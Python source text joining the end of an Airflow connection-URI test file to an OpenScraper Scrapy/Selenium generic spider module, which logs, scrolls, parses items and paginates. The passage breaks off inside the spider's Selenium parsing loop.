def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
@mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:[email protected]:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
if __name__ == '__main__':
unittest.main()
|
masterspider.py
|
# -*- encoding: utf-8 -*-
from tornado.log import enable_pretty_logging, LogFormatter, access_log, app_log, gen_log
from tornado.options import options
gen_log.info("--> importing .masterspider")
# import pprint
from pprint import pprint, pformat
import os
import shutil
from urllib2 import unquote, quote
import re
import time
from datetime import datetime
import json
# cf : http://blog.jmoz.co.uk/python-convert-datetime-to-timestamp/
""" # snippet datetime and timestamp
import datetime
readable = datetime.datetime.fromtimestamp(1520437834).isoformat()
print(readable)
# 2018-03-07T16:50:34+01:00
"""
### import app settings
# from config.settings_example import APP_PROD
# from config.settings_secret import APP_PROD
from config.settings_scrapy import *
from config.settings_cleaning import *
### lOGGER - SCRAPY
### logging only for scrapy
from os import path, remove
import logging
import logging.config
from logging.config import dictConfig
from config.settings_logging import logging_config
# set logger for scrapy
log_scrap = logging.getLogger("log_scraper")
log_scrap.setLevel(logging.DEBUG)
# Create the Handler for logging data to a file
logger_handler = logging.FileHandler('logs/openscraper_scrapy_logging.log')
logger_handler.setLevel(logging.WARNING)
# Create a Formatter for formatting the log messages
logger_formatter = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
# Add the Formatter to the Handler
logger_handler.setFormatter(logger_formatter)
# Add the Handler to the Logger
log_scrap.addHandler(logger_handler)
log_scrap.debug('>>> Completed configuring log_scraper !')
### import scrapy utilities
import scrapy
from multiprocessing import Process, Queue
from twisted.internet import reactor, defer
from scrapy.http import Request
from scrapy.utils.log import configure_logging
from scrapy.utils.project import get_project_settings
from scrapy.settings import Settings
from scrapy import Spider
from scrapy.crawler import CrawlerProcess, CrawlerRunner
from scrapy.exceptions import CloseSpider
# from scrapy.spiders import SitemapSpider, CrawlSpider
# import scrapy.crawler as crawler
### selenium
# cf : https://stackoverflow.com/questions/30345623/scraping-dynamic-content-using-python-scrapy
# cf : https://stackoverflow.com/questions/17975471/selenium-with-scrapy-for-dynamic-page
# cf : https://github.com/clemfromspace/scrapy-selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
import selenium.webdriver.support.ui as ui
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from time import sleep
### cf : https://intoli.com/blog/running-selenium-with-headless-chrome/
### cf : https://duo.com/decipher/driving-headless-chrome-with-python
options_selenium = webdriver.ChromeOptions()
# options.binary_location = '/usr/local/bin/chromedriver'
options_selenium.add_argument('headless')
# option.add_argument(' — incognito')
# set the window size
options_selenium.add_argument('window-size=1200x600')
# initialize the driver
# driver = webdriver.Chrome(chrome_options=options_selenium)
### executable path for chrome driver
# exec_chromedriver = "/usr/local/bin/chromedriver"
### settings scrapy
# s = get_project_settings()
# print "\ndefault settings scrapy : "
# pprint(dict(s))
# update settings from settings_scrapy.py
# s.update(dict(ITEM_PIPELINES={
# 'openscraper.pipelines.RestExportPipeline': 300,
# }))
# print "\nupdated settings scrapy : "
# pprint(dict(s))
### SCRAPY PIPELINES....
# update setting to use the pipeline which will write results (items) in the database or files
# cf self-contained scrapy : https://gist.github.com/alecxe/fc1527d6d9492b59c610
# cf self-contained scrapy : https://github.com/kirankoduru/scrapy-programmatically/
# cf : https://stackoverflow.com/questions/42511814/scrapy-passing-custom-settings-to-spider-from-script-using-crawlerprocess-crawl
### set scrapy from settings_scrapy.py
settings = Settings()
# settings.set( "BOT_NAME" , BOT_NAME )
# settings.set( "USER_AGENT" , USER_AGENT )
# settings.set( "ROBOTSTXT_OBEY" , ROBOTSTXT_OBEY )
# settings.set( "AUTOTHROTTLE_ENABLED" , AUTOTHROTTLE_ENABLED )
# settings.set( "HTTPCACHE_ENABLED" , HTTPCACHE_ENABLED )
# settings.set( "RANDOMIZE_DOWNLOAD_DELAY" , RANDOMIZE_DOWNLOAD_DELAY )
settings.set( "ITEM_PIPELINES" , ITEM_PIPELINES )
settings.set( "DB_DATA_URI" , DB_DATA_URI )
settings.set( "DB_DATA_DATABASE" , DB_DATA_DATABASE )
settings.set( "DB_DATA_COLL_SCRAP" , DB_DATA_COLL_SCRAP )
# settings.set( "RETRY_TIMES" , RETRY_TIMES )
# settings.set( "CONCURRENT_ITEMS" , CONCURRENT_ITEMS )
# settings.set( "CONCURRENT_REQUESTS" , CONCURRENT_REQUESTS )
settings.set( "CONCURRENT_REQUESTS_PER_DOMAIN" , CONCURRENT_REQUESTS_PER_DOMAIN )
settings.set( "REDIRECT_MAX_TIMES" , REDIRECT_MAX_TIMES )
settings.set( "DOWNLOAD_MAXSIZE" , DOWNLOAD_MAXSIZE )
# settings.set( "DEPTH_PRIORITY" , DEPTH_PRIORITY )
# settings.set( "SCHEDULER_DISK_QUEUE" , SCHEDULER_DISK_QUEUE )
# settings.set( "DEPTH_PRIORITY" , SCHEDULER_MEMORY_QUEUE )
log_scrap.debug (">>> settings scrapy : \n %s \n", pformat(dict(settings)) )
# pprint(dict(settings))
log_scrap.debug ("--- run_generic_spider / BOT_NAME : %s", settings.get('BOT_NAME'))
log_scrap.debug ("--- run_generic_spider / USER_AGENT : %s", settings.get('USER_AGENT'))
log_scrap.debug ("--- run_generic_spider / ITEM_PIPELINES : %s \n", settings.get('ITEM_PIPELINES').__dict__)
### import base_fields ###############
### import main args fom config.settings_corefields.py
from config.settings_corefields import * # mainly for DATAMODEL_CORE_FIELDS_ITEM
### import items
from items import * # GenericItem #, StackItem #ScrapedItem
### import mixins
# from mixins import GenericSpiderMixin
#####################################################
### define generic spider
### cf : https://blog.scrapinghub.com/2016/02/24/scrapy-tips-from-the-pros-february-2016-edition/
# process = crawler.CrawlerRunner()
### UTILS FOR SPIDERS
# to be used in run_generic_spider function
def flattenSpiderConfig(run_spider_config) :
"""creates a flat dict from nested spider_config dict"""
spider_config_flat = {}
for conf_class, conf_set in run_spider_config.iteritems() :
if conf_class != "_id" :
for conf_field, conf_data in conf_set.iteritems() :
spider_config_flat[conf_field] = conf_data
return spider_config_flat
def clean_xpath_for_reactive(xpath_str, strings_to_clean) :
""" clean a string given a list of words/strings """
for i in strings_to_clean :
xpath_str = xpath_str.replace(i, '')
last_car = xpath_str[-1]
if last_car == '/' :
xpath_str = xpath_str[:-1]
return xpath_str
def get_dictvalue_from_xpath(full_dict, path_string):
""" get a value in a dict given a path's string """
key_value = full_dict
for i in path_string.split('/')[1:] :
key_value = key_value[i]
return key_value
def scroll_down(driver, scroll_pause_time, max_loops=3) :
"""
scroll down a page with selenium
cf : https://stackoverflow.com/questions/20986631/how-can-i-scroll-a-web-page-using-selenium-webdriver-in-python
"""
log_scrap.info("--- scroll_down --- START ..." )
log_scrap.info("--- scroll_down / scroll_pause_time : %s ", scroll_pause_time )
log_scrap.info("--- scroll_down / max_loops : %s ", max_loops )
loop_number = 0
needs_scroll = True
# while True:
while loop_number <= max_loops and needs_scroll :
log_scrap.info("--- scroll_down --- STARTING LOOPS..." )
# Get scroll height
### This is the difference. Moving this *inside* the loop
### means that it checks if scrollTo is still scrolling
last_height = driver.execute_script("return document.body.scrollHeight")
log_scrap.info("--- scroll_down / last_height : %s", last_height )
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
log_scrap.info("--- scroll_down --- scrollTo /1..." )
# Wait to load page
time.sleep(scroll_pause_time)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
log_scrap.info("--- scroll_down / new_height : %s", new_height )
if new_height == last_height:
# try again (can be removed)
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(scroll_pause_time)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
log_scrap.info("--- scroll_down / new_height : %s", new_height )
# check if the page height has remained the same
# if new_height == last_height or loop_number >= max_loops :
if new_height == last_height :
# if so, you are done
needs_scroll = False
break
# if not, move on to the next loop
else:
last_height = new_height
loop_number += 1
continue
log_scrap.info("--- scroll_down --- END ..." )
return driver
# to be used in GenericSpider class
'''
def dictFromDataModelList (datamodel_list ) :
"""creates a correspondance dict from datamodel to _xpath """
# data_model_dict = { i : "{}_xpath".format(i) for i in datamodel_list }
data_model_dict = { str(i["_id"]) : i for i in datamodel_list }
return data_model_dict
'''
### ON ITEMS AND PIPELINES SEE : https://gist.github.com/alecxe/fc1527d6d9492b59c610
# class GenericSpiderUtils(Spider):
# """a generic spider utils class to contain all parsing functions"""
# ### spider class needs a default name
# name = "genericspiderutils"
# def __init__(self, user_id=None, datamodel=None, spider_id=None, spider_config_flat=None, *args, **kwargs) :
# ### super init/override spider class with current args
# log_scrap.info("--- GenericSpider / __init__ :")
# super(GenericSpider, self).__init__(*args, **kwargs)
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### GENERIC SPIDER #########################################################################
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### note : to stop process cf : https://stackoverflow.com/questions/19071512/socket-error-errno-48-address-already-in-use
class GenericSpider(Spider) :
"""a generic spider to be configured with datamodel and spider_config_flat variables"""
### spider class needs a default name
name = "genericspider"
def __init__(self, user_id = None,
datamodel = None,
spider_id = None,
spider_config_flat = None,
test_limit = None,
*args, **kwargs
) :
print ("\n\n{}\n".format("> > > "*20))
### super init/override spider class with current args
log_scrap.info("--- GenericSpider / __init__ :")
super(GenericSpider, self).__init__(*args, **kwargs)
self.user_id = user_id
self.spider_id = spider_id
self.test_limit = test_limit
log_scrap.info("--- GenericSpider / test_limit : %s ", self.test_limit )
self.item_count = 0
self.page_count = 1
# self.there_is_more_items_to_scrap = True
self.there_is_more_items_to_scrap_dict = {}
### store spider_config_flat
log_scrap.info("--- GenericSpider / spider_config_flat : \n %s ", pformat(spider_config_flat) )
self.spider_config_flat = spider_config_flat
### global infos on spider
self.spider_name = self.spider_config_flat['name']
self.spider_page_url = self.spider_config_flat['page_url']
# self.spider_current_starturl = ""
# self.settings_limit_pages = self.spider_config_flat['LIMIT']
self.settings_limit_pages = self.spider_config_flat['LIMIT_PAGES']
self.settings_limit_items = self.spider_config_flat['LIMIT_ITEMS']
log_scrap.info("--- GenericSpider / settings_limit_pages : %s ", self.settings_limit_pages )
log_scrap.info("--- GenericSpider / settings_limit_items : %s ", self.settings_limit_items )
### get settings for selenium
self.parse_reactive = self.spider_config_flat['parse_reactive']
self.scroll_pause_time = self.spider_config_flat['scroll_pause_time']
self.delay_driver = self.spider_config_flat['wait_driver'] # 5.0
self.delay_new_page = self.spider_config_flat['wait_page'] # 1.5
self.delay_implicit = self.spider_config_flat['wait_implicit'] # 0.5
self.delay_driver = self.spider_config_flat['scroll_pause_time'] # .5
# self.delay_item = self.spider_config_flat['LIMIT'] # 1.0
### getting all the config args from spider_config_flat (i.e. next_page, ...)
log_scrap.info("--- GenericSpider / passing kwargs..." )
for k, v in spider_config_flat.iteritems() :
# log_scrap.info(" - %s : %s " %(k, v) )
self.__dict__[k] = v
### getting data model for later use in item
log_scrap.info("--- GenericSpider / datamodel[:1] : \n %s \n ...", pformat(datamodel[:1]) )
### storing correspondance dict from datamodel
self.dm_core = { i["field_name"] : { "field_type" : i["field_type"] } for i in datamodel if i["field_class"] == "core" }
self.dm_core_item_related = DATAMODEL_CORE_FIELDS_ITEM
self.dm_custom = { str(i["_id"]) : { "field_type" : i["field_type"],
"field_name" : i["field_name"]
} for i in datamodel if i["field_class"] == "custom" }
log_scrap.info("--- GenericSpider / dm_custom : \n %s", pformat(self.dm_custom) )
self.dm_custom_list = self.dm_custom.keys()
self.dm_item_related = self.dm_custom_list + self.dm_core_item_related
log_scrap.info("--- GenericSpider / dm_item_related : \n %s", pformat(self.dm_item_related) )
### SPLASH
### cf : https://blog.scrapinghub.com/2015/03/02/handling-javascript-in-scrapy-with-splash/
def start_requests(self) :
log_scrap.info("--- GenericSpider.start_requests ... " )
for url in self.start_urls :
log_scrap.info("--- GenericSpider.start_requests / url : %s ", url )
# self.spider_current_starturl = url
self.there_is_more_items_to_scrap_dict[url] = True
log_scrap.info("--- GenericSpider.start_requests / starting first Scrapy request... " )
yield Request(url=url, callback=self.parse, dont_filter=True, meta={'start_url': url} )
# yield Request(url=url, callback=self.parse, meta={'start_url': url} )
### parsing with scrapy
def parse(self, response):
""" parsing pages to scrap data with Scrapy requests"""
### close spider if exception
if 'Bandwidth exceeded' in response.body:
raise CloseSpider('bandwidth_exceeded')
log_scrap.debug(u"\n>>> NEW PARSING >>>\n" )
log_scrap.info("--- GenericSpider.parse ..." )
log_scrap.info("\n--- GenericSpider.parse /response : \n%s" , response)
log_scrap.info("\n--- GenericSpider.parse /response : \n%s \n" , response.__dict__.keys() )
# for k, v in response.__dict__.iteritems() :
# log_scrap.info("\n--- [k] {} : [v] {} : ".format(k,v))
# print response._body
start_url = response.meta["start_url"]
log_scrap.info("--- GenericSpider.parse / start_url : %s", start_url )
### - - - - - - - - - - - - - - - - - - - - - - - ###
### start request with API crawler
### - - - - - - - - - - - - - - - - - - - - - - - ###
# if self.spider_config_flat["parse_api"] == True :
if self.parse_api == True :
log_scrap.info("\n--- GenericSpider.parse / starting request on API endpoint... " )
jsonresponse = json.loads(response.body_as_unicode())
# log_scrap.info("--- GenericSpider.parse / jsonresponse : \n%s", jsonresponse )
log_scrap.info("--- GenericSpider.parse / jsonresponse received..." )
raw_items_list = get_dictvalue_from_xpath(jsonresponse, self.item_xpath)
# raw_items_list = jsonresponse[self.item_xpath]
log_scrap.info("--- GenericSpider.parse / raw_items_list[0] : \n%s\n...", pformat(raw_items_list[0]) )
### - - - - - - - - - - ###
### PARSING PAGE - API
### start parsing page : loop through data items in page in response
if len(raw_items_list) != 0 :
log_scrap.info("--- GenericSpider. / START LOOPING raw_items_list WITH API ..." )
# while self.there_is_more_items_to_scrap_dict[start_url] :
for raw_data in raw_items_list :
self.item_count += 1
### check if can continue depending on item_count
if self.settings_limit_items == 0 or self.item_count <= self.settings_limit_items :
print()
log_scrap.debug(u">>> NEW ITEM - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEW ITEM - current start_url : {} >>>".format(start_url) )
log_scrap.debug(u">>> NEW ITEM - API - item n°{} >>> \n".format(self.item_count) )
### instantiate Item to fill from datamodel --> cf items.py
itemclass = create_item_class( 'GenericItemClass', fields_list = self.dm_item_related )
item = itemclass()
### add global info to item : i.e. core fields in dm_core_item_related list
item[ 'spider_id' ] = self.spider_id
item[ 'added_by' ] = self.user_id
item[ 'added_at' ] = time.time() # timestamp
item[ 'link_src' ] = response._url
item[ 'page_n' ] = self.page_count
item[ 'item_n' ] = self.item_count
### extract data and feed it to the Item instance based on spider_config_flat
item = self.fill_item_from_results_page(raw_data, item, is_api_rest=True, item_n=self.item_count)
### - - - - - - - - - - ###
### FOLLOW LINK - API
### if need to follow to extract all data
if self.spider_config_flat["parse_follow"] == True :
log_scrap.debug(u">>> FOLLOW LINK - API - item n°{} / page n°{} >>>>>> \n".format(self.item_count, self.page_count) )
log_scrap.info("--- GenericSpider. / self.follow_xpath : %s", self.follow_xpath )
# follow_link_raw = raw_data[ self.follow_xpath ]
follow_link_raw = get_dictvalue_from_xpath(raw_data, self.follow_xpath)
log_scrap.info(" --> follow_link RAW ({}) : {} ".format(type(follow_link_raw),follow_link_raw) )
url_follow = ""
if self.api_follow_root != "" :
url_follow = self.api_follow_root
else :
url_follow = self.page_url
# complete follow link if needed
follow_link = self.clean_link(follow_link_raw, url_root=url_follow)
log_scrap.info(" --> follow_link CLEAN : %s ", follow_link )
# store follow_link
item[ 'link_data' ] = follow_link
url = item['link_data']
follow_is_api = self.follow_is_api
try :
yield scrapy.Request(url, callback=self.parse_detailed_page, meta={ 'item': item, 'start_url' : start_url, 'item_n' : self.item_count , 'parse_api' : follow_is_api })
except :
yield item
### if no follow link
else :
### item completion is finished - yield and so spark pipeline for item (store in db for instance)
yield item
# log_scrap.info(" --> item : \n %s \n", pformat(item) )
log_scrap.debug(u" --> item ..." )
else :
log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {}".format(self.item_count, self.LIMIT_ITEMS) )
# self.there_is_more_items_to_scrap_dict[start_url] = False
# log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {}".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF LIMIT_ITEMS')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF ITEMS')
### - - - - - - - - - - - - ###
### NEXT PAGE - API
if self.test_limit == None or self.page_count < self.test_limit :
if self.page_count < self.settings_limit_pages or self.settings_limit_pages == 0 :
log_scrap.info("--- GenericSpider.parse (API) >>> PAGE n°{} DONE -> NEXT PAGE >>> \n".format(self.page_count) )
### get and go to next page
self.page_count += 1
url_next = ""
if self.api_pagination_root != "" :
url_next = self.api_pagination_root
else :
url_next = self.page_url
log_scrap.debug(u">>> NEXT PAGE - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.debug(u">>> NEXT PAGE - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEXT PAGE - current start_url : {} >>>".format(start_url) )
next_page = url_next + str(self.page_count)
log_scrap.info("--- GenericSpider.parse >>> NEXT PAGE II : %s", next_page )
yield response.follow(next_page, callback=self.parse, meta={'start_url': start_url} )
else :
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - page n°{} - limit : {} - test_limit : {} ".format(self.page_count, self.settings_limit_pages, self.test_limit) )
# raise CloseSpider('OUT OF TEST_LIMIT')
else :
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} ".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF TEST_LIMIT')
### - - - - - - - - - - - - - - - - - - - - - - - ###
### start requests with pure Scrapy requests
### - - - - - - - - - - - - - - - - - - - - - - - ###
elif self.spider_config_flat["parse_reactive"] == False :
# elif self.parse_reactive == False :
log_scrap.info("\n--- GenericSpider.parse / starting requests with Scrapy... " )
# self.parse_scrapy(response)
### find items list
log_scrap.info("--- GenericSpider.parse / self.item_xpath : %s", self.item_xpath )
raw_items_list = response.xpath(self.item_xpath)
log_scrap.info("--- GenericSpider.parse / len(raw_items_list) : %d ", len(raw_items_list) )
### - - - - - - - - - - - ###
### PARSING PAGE - SCRAPY
### start parsing page : loop through data items in page in response
if len(raw_items_list) != 0 :
log_scrap.info("--- GenericSpider. / START LOOPING raw_items_list WITH SCRAPY ..." )
for raw_data in raw_items_list :
self.item_count += 1
### check if can continue depending on item_count
if self.settings_limit_items == 0 or self.item_count <= self.settings_limit_items :
print()
log_scrap.debug(u">>> NEW ITEM - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEW ITEM - current start_url : {} >>>".format(start_url) )
log_scrap.debug(u">>> NEW ITEM - Scrapy - item n°{} / page n°{} >>> \n".format(self.item_count, self.page_count) )
# print ">>> raw_data : \n", raw_data.extract()
### instantiate Item to fill from datamodel --> cf items.py
itemclass = create_item_class( 'GenericItemClass', fields_list = self.dm_item_related )
item = itemclass()
### add global info to item : i.e. core fields in dm_core_item_related list
item[ 'spider_id' ] = self.spider_id
item[ 'added_by' ] = self.user_id
item[ 'added_at' ] = time.time() # timestamp
item[ 'link_src' ] = response._url
item[ 'page_n' ] = self.page_count
item[ 'item_n' ] = self.item_count
### extract data and feed it to the Item instance based on spider_config_flat
item = self.fill_item_from_results_page(raw_data, item, item_n=self.item_count)
### - - - - - - - - - - - ###
### FOLLOW LINK - SCRAPY
### if need to follow to extract all data
if self.spider_config_flat["parse_follow"] == True :
log_scrap.debug(u">>> FOLLOW LINK - SCRAPY - item n°{} / page n°{} >>>>>> \n".format(self.item_count, self.page_count) )
log_scrap.info("--- GenericSpider. / self.follow_xpath : %s", self.follow_xpath )
follow_link = raw_data.xpath( self.follow_xpath ).extract_first()
log_scrap.info(" --> follow_link RAW ({}) : {} ".format(type(follow_link),follow_link) )
url_follow = ""
if self.api_follow_root != "" :
url_follow = self.api_follow_root
# complete follow link if needed
follow_link = self.clean_link(follow_link, url_root=url_follow)
# log_scrap.info(" --> follow_link CLEAN : %s ", follow_link )
log_scrap.info(" --> follow_link CLEAN ({}) : {} ".format(type(follow_link),follow_link) )
# store follow_link
item[ 'link_data' ] = follow_link
url = item['link_data']
try :
log_scrap.warning(u">>> FOLLOWING LINK --> url : {} ".format(url) )
# yield Request(url, callback=self.parse_detailed_page, meta={ 'item': item, 'start_url' : start_url } )
yield scrapy.Request(url, callback=self.parse_detailed_page, meta={ 'item': item, 'start_url' : start_url , 'item_n' : self.item_count , 'parse_api' : False} )
# log_scrap.warning(u">>> FOLLOWING LINK --> url : {} / WORKED !!! ".format(url) )
except :
log_scrap.warning(u">>> FOLLOW LINK - NOT WORKING : {} ".format(url) )
yield item
### if no follow link
else :
log_scrap.warning(u">>> NO FOLLOW LINK ... " )
### item completion is finished - yield and so spark pipeline for item (store in db for instance)
# log_scrap.info(">>> GenericSpider.parse - item.items() : \n %s", item.items() )
# log_scrap.info(">>> GenericSpider.parse - item.keys() : \n %s", item.items() )
yield item
# print ("\n>>> NEXT ITEM " + ">>> >>> "*10, "\n")
# log_scrap.info(" --> item : \n %s \n", pformat(item) )
log_scrap.debug(u" --> item ..." )
else :
log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {}".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF LIMIT_ITEMS')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF ITEMS')
### - - - - - - - - - - ###
### NEXT PAGE - SCRAPY
### check if there is a test_limit
if self.test_limit == None or self.page_count < self.test_limit :
if self.page_count < self.settings_limit_pages or self.settings_limit_pages == 0 :
log_scrap.info("--- GenericSpider.parse (Scrapy) >>> PAGE n°{} DONE -> NEXT PAGE >>> \n".format(self.page_count) )
### get and go to next page
is_next_page, next_page = self.get_next_page(response, start_url)
if is_next_page :
self.page_count += 1
url_next = ""
if self.api_pagination_root != "" :
url_next = self.api_pagination_root
log_scrap.debug(u">>> NEXT PAGE - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.debug(u">>> NEXT PAGE - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEXT PAGE - current start_url : {} >>>".format(start_url) )
log_scrap.info("--- GenericSpider.parse >>> NEXT PAGE I : %s", next_page )
next_page = self.clean_link(next_page, url_root=url_next)
log_scrap.info("--- GenericSpider.parse >>> NEXT PAGE II : %s", next_page )
yield response.follow(next_page, callback=self.parse, meta={'start_url': start_url} )
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / NO MORE PAGE TO SCRAP - pages count : {} ".format(self.page_count) )
# raise CloseSpider('NO MORE PAGE TO SCRAP')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - page n°{} - limit : {} - test_limit : {} / except -> break".format(self.page_count, self.settings_limit_pages, self.test_limit) )
# raise CloseSpider('OUT OF TEST_LIMIT')
else :
# self.there_is_more_items_to_scrap = False
# self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
# raise CloseSpider('OUT OF TEST_LIMIT')
### - - - - - - - - - - - - - - - - - - - - - - - ###
### start requests with Selenium
### - - - - - - - - - - - - - - - - - - - - - - - ###
else :
### initiate selenium browser
### cf : https://github.com/voliveirajr/seleniumcrawler/blob/master/seleniumcrawler/spiders/seleniumcrawler_spider.py
log_scrap.info("\n--- GenericSpider.parse / starting Selenium driver... " )
# retrieve exec path for chromedriver from settings_scrapy.py
### GET APP MODE FROM ENV VARS
app_mode = os.environ.get('APP_MODE', 'default')
log_scrap.debug(u"--- GenericSpider.parse / APP_MODE : %s", app_mode)
chromedriver_path = CHROMEDRIVER_PATH_LIST[ app_mode ]
log_scrap.debug(u"--- GenericSpider.parse / chromedriver_path : %s", chromedriver_path)
### specify executable path to launch webdriver-->
# cf : where chromedriver was installed when `brew install chromedriver`
self.driver = webdriver.Chrome(executable_path=chromedriver_path, chrome_options=options_selenium)
# self.driver = webdriver.Chrome(chrome_options=options_selenium)
# self.driver = webdriver.Firefox()
# self.driver = webdriver.Chrome()
# self.driver = webdriver.PhantomJS() ### deprecated
### setup waiting times
# self.driver.set_page_load_timeout(60)
self.wait_driver = WebDriverWait(self.driver, self.delay_driver)
self.wait_page = WebDriverWait(self.driver, self.delay_new_page)
self.driver.implicitly_wait(self.delay_implicit)
log_scrap.debug(u"--- GenericSpider. / self.delay_driver : %s", self.delay_driver )
log_scrap.debug(u"--- GenericSpider. / self.delay_new_page : %s", self.delay_new_page )
log_scrap.debug(u"--- GenericSpider. / self.delay_implicit : %s", self.delay_implicit )
### start parsing with selenium
log_scrap.debug(u"--- GenericSpider. / response._url : %s", response._url )
try :
self.driver.get(response._url)
### try scroll_down if needed in config
if self.spider_config_flat['scroll_down'] :
log_scrap.info("--- GenericSpider. / scroll_down is TRUE ... " )
# log_scrap.debug(u"--- GenericsSpider. / scroll_down - self.spider_config_flat : \n%s", pformat(self.spider_config_flat) )
scroll_pause_time = self.spider_config_flat["scroll_pause_time"]
max_loops = self.spider_config_flat["scroll_loops"]
self.driver = scroll_down(self.driver, scroll_pause_time, max_loops)
# scroll_down(self.driver, scroll_pause_time, max_loops)
log_scrap.info("--- GenericSpider. / url '{}' is loaded ... ".format( response._url ))
except :
# self.there_is_more_items_to_scrap = False
self.there_is_more_items_to_scrap_dict[start_url] = False
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
raise CloseSpider('DRIVER NOT RESPONDING')
### clean original xpath from strings
strings_to_clean = [
'/@src',
'/@href',
'/text()',
'/@*[name()="xlink:href"]',
'/@datetime'
]
# while self.there_is_more_items_to_scrap :
while self.there_is_more_items_to_scrap_dict[start_url] :
# log_scrap.debug(u"--- GenericSpider. / while loop continues : %s", self.there_is_more_items_to_scrap )
log_scrap.debug(u"--- GenericSpider. / while loop continues : %s", self.there_is_more_items_to_scrap_dict[start_url] )
try :
### wait / debug page content
page_source_code = self.driver.page_source.encode("utf-8")
# log_scrap.debug(u"--- GenericSpider. / page_source_code : \n %s ", page_source_code )
time.sleep(self.delay_new_page)
### start parsing page :
log_scrap.info("--- GenericSpider. / self.item_xpath : %s", self.item_xpath )
raw_items_list = self.driver.find_elements_by_xpath(self.item_xpath)
log_scrap.info("--- GenericSpider. / raw_items_list length : %s", len(raw_items_list) )
# log_scrap.info("--- GenericSpider. / raw_items_list[0].text : \n%s", raw_items_list[0].text )
# current_item_index = 0
### - - - - - - - - - - - - ###
### PARSING PAGE - SELENIUM
# loop through data items in page in response
if len(raw_items_list) != 0 :
# log_scrap.info("--- GenericSpider. / START PARSING WITH SELENIUM ...\n" )
for raw_data in raw_items_list :
print()
log_scrap.debug(u"--- GenericSpider. / START LOOPING raw_items_list WITH SELENIUM ..." )
### add +1 to items count
self.item_count += 1
# log_scrap.debug(u"--- GenericSpider. / VARIABLES - spider_name : {} - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(str(self.spider_name), self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
# log_scrap.debug(u"--- GenericSpider. / VARIABLES - spider_name : {} - item n°{} ".format(self.spider_name, self.item_count) )
# log_scrap.debug(u"--- GenericSpider. / VARIABLES - item n°{} ".format(self.item_count) )
